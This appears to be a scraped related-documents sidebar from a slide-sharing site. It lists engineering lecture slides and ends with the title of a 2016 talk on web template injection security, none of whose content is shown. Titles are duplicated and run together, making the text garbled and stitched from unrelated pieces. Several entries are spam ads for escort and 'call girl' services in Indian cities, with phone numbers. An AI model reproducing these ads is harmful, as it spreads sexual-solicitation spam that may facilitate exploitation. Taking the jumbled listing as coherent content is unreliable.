Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...Christo Ananth
 
UNIT-III FMM. DIMENSIONAL ANALYSIS
UNIT-III FMM. DIMENSIONAL ANALYSISUNIT-III FMM. DIMENSIONAL ANALYSIS
UNIT-III FMM. DIMENSIONAL ANALYSISrknatarajan
 
High Profile Call Girls Nagpur Meera Call 7001035870 Meet With Nagpur Escorts
High Profile Call Girls Nagpur Meera Call 7001035870 Meet With Nagpur EscortsHigh Profile Call Girls Nagpur Meera Call 7001035870 Meet With Nagpur Escorts
High Profile Call Girls Nagpur Meera Call 7001035870 Meet With Nagpur EscortsCall Girls in Nagpur High Profile
 
result management system report for college project
result management system report for college projectresult management system report for college project
result management system report for college projectTonystark477637
 
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...ranjana rawat
 
MANUFACTURING PROCESS-II UNIT-5 NC MACHINE TOOLS
MANUFACTURING PROCESS-II UNIT-5 NC MACHINE TOOLSMANUFACTURING PROCESS-II UNIT-5 NC MACHINE TOOLS
MANUFACTURING PROCESS-II UNIT-5 NC MACHINE TOOLSSIVASHANKAR N
 
High Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur Escorts
High Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur EscortsHigh Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur Escorts
High Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur Escortsranjana rawat
 
UNIT-II FMM-Flow Through Circular Conduits
UNIT-II FMM-Flow Through Circular ConduitsUNIT-II FMM-Flow Through Circular Conduits
UNIT-II FMM-Flow Through Circular Conduitsrknatarajan
 
Microscopic Analysis of Ceramic Materials.pptx
Microscopic Analysis of Ceramic Materials.pptxMicroscopic Analysis of Ceramic Materials.pptx
Microscopic Analysis of Ceramic Materials.pptxpurnimasatapathy1234
 

Último (20)

AKTU Computer Networks notes --- Unit 3.pdf
AKTU Computer Networks notes --- Unit 3.pdfAKTU Computer Networks notes --- Unit 3.pdf
AKTU Computer Networks notes --- Unit 3.pdf
 
Processing & Properties of Floor and Wall Tiles.pptx
Processing & Properties of Floor and Wall Tiles.pptxProcessing & Properties of Floor and Wall Tiles.pptx
Processing & Properties of Floor and Wall Tiles.pptx
 
Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...
Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...
Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...
 
Introduction to Multiple Access Protocol.pptx
Introduction to Multiple Access Protocol.pptxIntroduction to Multiple Access Protocol.pptx
Introduction to Multiple Access Protocol.pptx
 
VIP Call Girls Service Kondapur Hyderabad Call +91-8250192130
VIP Call Girls Service Kondapur Hyderabad Call +91-8250192130VIP Call Girls Service Kondapur Hyderabad Call +91-8250192130
VIP Call Girls Service Kondapur Hyderabad Call +91-8250192130
 
SPICE PARK APR2024 ( 6,793 SPICE Models )
SPICE PARK APR2024 ( 6,793 SPICE Models )SPICE PARK APR2024 ( 6,793 SPICE Models )
SPICE PARK APR2024 ( 6,793 SPICE Models )
 
Call Girls Pimpri Chinchwad Call Me 7737669865 Budget Friendly No Advance Boo...
Call Girls Pimpri Chinchwad Call Me 7737669865 Budget Friendly No Advance Boo...Call Girls Pimpri Chinchwad Call Me 7737669865 Budget Friendly No Advance Boo...
Call Girls Pimpri Chinchwad Call Me 7737669865 Budget Friendly No Advance Boo...
 
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
 
College Call Girls Nashik Nehal 7001305949 Independent Escort Service Nashik
College Call Girls Nashik Nehal 7001305949 Independent Escort Service NashikCollege Call Girls Nashik Nehal 7001305949 Independent Escort Service Nashik
College Call Girls Nashik Nehal 7001305949 Independent Escort Service Nashik
 
Introduction and different types of Ethernet.pptx
Introduction and different types of Ethernet.pptxIntroduction and different types of Ethernet.pptx
Introduction and different types of Ethernet.pptx
 
Coefficient of Thermal Expansion and their Importance.pptx
Coefficient of Thermal Expansion and their Importance.pptxCoefficient of Thermal Expansion and their Importance.pptx
Coefficient of Thermal Expansion and their Importance.pptx
 
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
 
UNIT-III FMM. DIMENSIONAL ANALYSIS
UNIT-III FMM. DIMENSIONAL ANALYSISUNIT-III FMM. DIMENSIONAL ANALYSIS
UNIT-III FMM. DIMENSIONAL ANALYSIS
 
High Profile Call Girls Nagpur Meera Call 7001035870 Meet With Nagpur Escorts
High Profile Call Girls Nagpur Meera Call 7001035870 Meet With Nagpur EscortsHigh Profile Call Girls Nagpur Meera Call 7001035870 Meet With Nagpur Escorts
High Profile Call Girls Nagpur Meera Call 7001035870 Meet With Nagpur Escorts
 
result management system report for college project
result management system report for college projectresult management system report for college project
result management system report for college project
 
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
 
MANUFACTURING PROCESS-II UNIT-5 NC MACHINE TOOLS
MANUFACTURING PROCESS-II UNIT-5 NC MACHINE TOOLSMANUFACTURING PROCESS-II UNIT-5 NC MACHINE TOOLS
MANUFACTURING PROCESS-II UNIT-5 NC MACHINE TOOLS
 
High Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur Escorts
High Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur EscortsHigh Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur Escorts
High Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur Escorts
 
UNIT-II FMM-Flow Through Circular Conduits
UNIT-II FMM-Flow Through Circular ConduitsUNIT-II FMM-Flow Through Circular Conduits
UNIT-II FMM-Flow Through Circular Conduits
 
Microscopic Analysis of Ceramic Materials.pptx
Microscopic Analysis of Ceramic Materials.pptxMicroscopic Analysis of Ceramic Materials.pptx
Microscopic Analysis of Ceramic Materials.pptx
 

Web Çatı Şablonlarının Güvenliği (SSTI) - Özgür Web Günleri 2016